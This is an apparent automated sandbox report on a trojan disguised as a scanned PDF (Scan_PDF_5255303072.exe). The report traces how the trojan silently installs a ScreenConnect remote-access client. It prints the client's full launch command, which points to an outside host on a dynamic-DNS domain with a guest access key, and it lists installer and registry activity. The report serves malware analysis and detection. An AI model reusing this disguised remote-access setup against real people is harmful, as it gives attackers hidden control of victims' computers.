                              Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390661165.00000000041A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: Scan_PDF_5255303072.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

                              System Summary

                              barindex
                              Source: initial sampleStatic PE information: Filename: Scan_PDF_5255303072.exe
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C13D80 CreateProcessAsUserW,8_2_05C13D80
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4a71ec.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{98FA6172-4354-E89C-196A-00A1A1714F7D}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74E9.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74FA.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A98.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4a71ee.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4a71ee.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{98FA6172-4354-E89C-196A-00A1A1714F7D}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\gquftksg.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\gquftksg.newcfgJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI74FA.tmpJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AEF0D00_2_05AEF0D0
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AE6F200_2_05AE6F20
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AE9F200_2_05AE9F20
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AE60E00_2_05AE60E0
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AE6F100_2_05AE6F10
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05B0039B0_2_05B0039B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01ADB5508_2_01ADB550
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01ADA8208_2_01ADA820
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01ADA8308_2_01ADA830
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C004488_2_05C00448
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C11B408_2_05C11B40
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C11B408_2_05C11B40
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10080DFD9_2_00007FFB10080DFD
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10086E209_2_00007FFB10086E20
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10080EA39_2_00007FFB10080EA3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB100813879_2_00007FFB10081387
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10429CB89_2_00007FFB10429CB8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB1042D6C59_2_00007FFB1042D6C5
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB104261C09_2_00007FFB104261C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB104227459_2_00007FFB10422745
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB10070DFD10_2_00007FFB10070DFD
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB10070EA310_2_00007FFB10070EA3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB104311CA10_2_00007FFB104311CA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB1041428510_2_00007FFB10414285
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB1041FBCA10_2_00007FFB1041FBCA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB1042543510_2_00007FFB10425435
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB10430FCA10_2_00007FFB10430FCA
                              Source: Scan_PDF_5255303072.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_5255303072.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_5255303072.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_5255303072.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_5255303072.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.00000000008AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.00000000008AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1384725267.0000000003240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1456809649.000000000ADED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.mu vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1384122334.0000000003090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1395763428.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.Scan_PDF_5255303072.exe.5760000.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal46.troj.evad.winEXE@18/53@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: Scan_PDF_5255303072.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Scan_PDF_5255303072.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: Scan_PDF_5255303072.exeReversingLabs: Detection: 18%
                              Source: Scan_PDF_5255303072.exeVirustotal: Detection: 25%
                              Source: Scan_PDF_5255303072.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: Scan_PDF_5255303072.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeFile read: C:\Users\user\Desktop\Scan_PDF_5255303072.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Scan_PDF_5255303072.exe "C:\Users\user\Desktop\Scan_PDF_5255303072.exe"
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3AJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeSection loaded: sspicli.dllJump to behavior
